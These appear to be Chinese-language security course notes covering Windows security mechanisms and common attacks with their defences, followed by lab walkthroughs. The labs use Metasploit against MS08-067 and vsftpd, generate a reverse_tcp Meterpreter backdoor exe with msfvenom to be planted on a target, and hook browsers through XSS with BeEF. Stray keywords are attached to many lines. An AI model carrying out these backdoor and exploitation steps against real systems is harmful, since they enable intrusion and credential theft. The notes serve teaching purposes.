Black_Hat_Python_Chapter6
Black_Hat_Python_Chapter9html
一、windows基本結構分爲運行於處理器特權模式的操做系統內核以及運行在處理器非特權模式的用戶,即爲內核態和用戶態。python
二、核心機制:進程和線程管理機制、內存管理機制、文件管理機制、註冊表管理機制、網絡管理機制。git
三、網絡管理機制:網卡硬件驅動程序(物理層)、NDIS庫以及miniport驅動程序(鏈路層)、TDI傳輸層(網絡協議驅動)(網絡層和傳輸層)、網絡APID以及TDI客戶端(會話層和表示層)、網絡應用程序和服務進程(應用層).github
一、監控器模型:主體到客體的訪問都經過監控器做中間,由引用監控器根據安全訪問控制策略來進行受權訪問,全部訪問記錄都由監控器生成審計日誌。算法
二、核心:SRM安全引用監控(內核中)、LSASS安全服務(用戶態)、winlogon/netlogn、以及Eventlogsql
三、身份認證機制:安全主體:用戶、用戶組、計算機 身份認證:本地身份認證(winlogon進程、GINA圖形化登陸窗口與LSASS服務)、網絡身份認證(NTLM、Lanman、kerberos)shell
四、受權與訪問控制機制:對象:文件,目錄,註冊表鍵值,內核對象,同步對象,私有對象,管道,內存,通訊接口。 屬性組成:Owner SID,Group SID,DACL自主訪問控制列表,SACL系統審計訪問控制列表。數據庫
五、安全審計機制windows
六、其餘安全機制:安全中心(防火牆、補丁自動更新、病毒防禦),IPsec加載和驗證機制,EPS加密文件系統,windows文件保護機制,捆綁的IE瀏覽器所提供的隱私保護和瀏覽器安全保護機制。瀏覽器
一、包括遠程口令猜解攻擊、windows網絡服務攻擊,windows客戶端和用戶攻擊。
二、遠程口令猜解攻擊: 遠程口令猜解:SMB協議(tcp44五、tcp139),其餘包括WMI服務、TS遠程桌面終端服務,MY SQL數據庫服務、SharePoint。
3遠程口令猜解的防範:關閉沒必要要的易受攻擊的網絡服務、配置主機防火牆來限制某些端口服務、網絡防火牆限制這些服務的訪問、禁用過期且有安全缺陷的Lanman和NTLM、指定強口令策略。
四、網絡服務遠程滲透攻擊:針對NETBIOS服務的著名漏洞和攻擊、針對SMB服務的著名漏洞和攻擊、針對MSRPC服務的著名漏洞和攻擊、針對windows系統上微軟網絡的遠程滲透攻擊、針對windows系統上第三方服務的遠程滲透攻擊。
5.網絡服務遠程滲透防範措施:最基本的是儘可能避免與消除這些滲透攻擊所依賴的服務軟件安全漏洞。
一、本地提權攻擊:利用操做系統內核、特權用戶啓動程序中安全缺陷與漏洞,緣由是服務器和桌面系統沒有即時進行補丁更新。
二、敏感信息竊取: windows系統口令密文提取技術(拷貝口令密文文件、rdisk工具有份、pwdumpx從SAM文件或者活動目錄中提取口令密文) windows系統口令字破解技術、用戶敏感數據竊取:find、findstr、grep、meterpreter
3.本地敏感信息竊取防範:選擇高強度、高防護的口令,使用更安全的加密明文算法,安全配置策略。
使用Metaspoit攻擊MS08-067。
一、打開postgresql服務
二、攻擊機ip爲149
三、win靶機ip爲146
四、開啓msfconsole控制檯
五、搜索ms08-067
六、利用067漏洞
七、設置攻擊機ip和win靶機ip,exploit
八、攻擊成功,獲得win靶機的shell
「searchsploit」是一個用於Exploit-DB的命令行搜索工具,它還容許你隨身帶一份Exploit-DB的副本。
searchsploit wordpress列出了漏洞和文件地址。
Metasploit在滲透測試中常常被用到,實際上這套軟件包括了不少工具,這些工具組成了一個完整的攻擊框架。
先使用命令service postgresql start開啓PostgreSQL數據庫服務,而後使用msfconsole開啓metasploit服務。
使用winxp環境做爲靶機,先使用nmap對靶機所開放的端口服務版本進行探測:(這裏,我電腦的kali環境運行msfconsole出現沒法分配內存的問題,這裏先使用網上使用步驟截圖)
掃描得知,目標21端口vsftpd版本爲5.0,使用msfconsole打開的msf中使用命令search vsftpd,查看是否存在相應的漏洞利用exploit:
接着利用命令 use使用該工具,選擇exploit,查看參數:
選擇payload,Required顯示yes,表示須要被設置,設置好遠程IP地址:
使用set命令設置參數,說明已經參數已經被設置好:
輸入exploit便可進行攻擊測試,若是成功,將返回一個shell,出現綠色的UID,說明攻擊比較成功。這時能夠查看靶機的IP,cat到一些信息。
Meterpreter是Metasploit框架中的一個拓展模塊,做爲溢出成功後的攻擊載荷使用。攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個Meterpretershell的連接。
Meterpreter做爲後滲透模塊有不少類型,而且命令由核心命令和擴展庫命令組成,極大的豐富了攻擊方式。其有不少的功能,如添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等。
經常使用的命令:
background 將當前會話放置後臺
load/use 加載模塊
interact 切換進一個信道
migrate 遷移進程
run 執行一個已有的模塊
Resource 執行一個已有的rc腳本經常使用的meterpreter類型:
payload windows/meterpreter/reverse_tcp
打開MSF,開啓監聽(選擇exploit/multi/handler):
後執行下面指令生成後門exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 -i 5 -f exe /root/door.exe
如今能夠將生成的exe文件保存到目標主機開始攻擊。
在跳板機獲取必定權限後,須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統的漏洞,藉助Msf已經獲得的Meterpreter後門,可使後續操做更容易。
對XSS漏洞的利用須要一個強大的框架支持,BeeF是瀏覽器攻擊框架的簡稱,是一款專一於瀏覽器端的滲透工具。
命令行下啓動BeeF,直接使用命令 beef-xss便可,打開瀏覽器,會自動跳轉至beef登陸頁面:
默認用戶名密碼均爲beef:
進入主界面:
咱們假設被測試主機因爲XSS漏洞請求到頁面http://127.0.0.1:3000/demos/basic.html,這是一個測試頁面,若是經過XSS把該頁面加入頁面請求中,則訪問者就會被BeEF hook 到,即加入到 Online Browsers中。
這樣在主界面左端就能夠看到一個在線主機:
HOOK持續的時間爲關閉測試頁面爲止,在此期間至關於被控制了,能夠發送攻擊命令,在Commands模塊咱們能夠完成不少任務。
其中。4中顏色分別表示:
BeEF還可以配合Metasploit進一步滲透主機。BeEF 默認不加載 Metasploit,若是要使用 Metasploit 豐富的攻擊模塊,須要作如下配置:
進入目錄/usr/share/beef-xss/,修改 config.yaml 文件,將metasploit設置爲true。
進入目錄/usr/share/beef-xss/extensions/metasploit,修改 config.yaml 文件,host和callback_host設置成本機IP地址,而後再修改Custom路徑便可。
打開msfconsole,輸入命令load msgrpc ServerHost=192.168.92.150 Pass=abc123
進入目錄/usr/share/beef-xss/,執行./beef -x命令,從新加載metasploit模塊。
service beef-xss restart命令重啓服務,而後從新登錄 BeEF,metasploit下增長了不少可使用的攻擊模塊,如今就可使用metasploit的模塊進行攻擊了。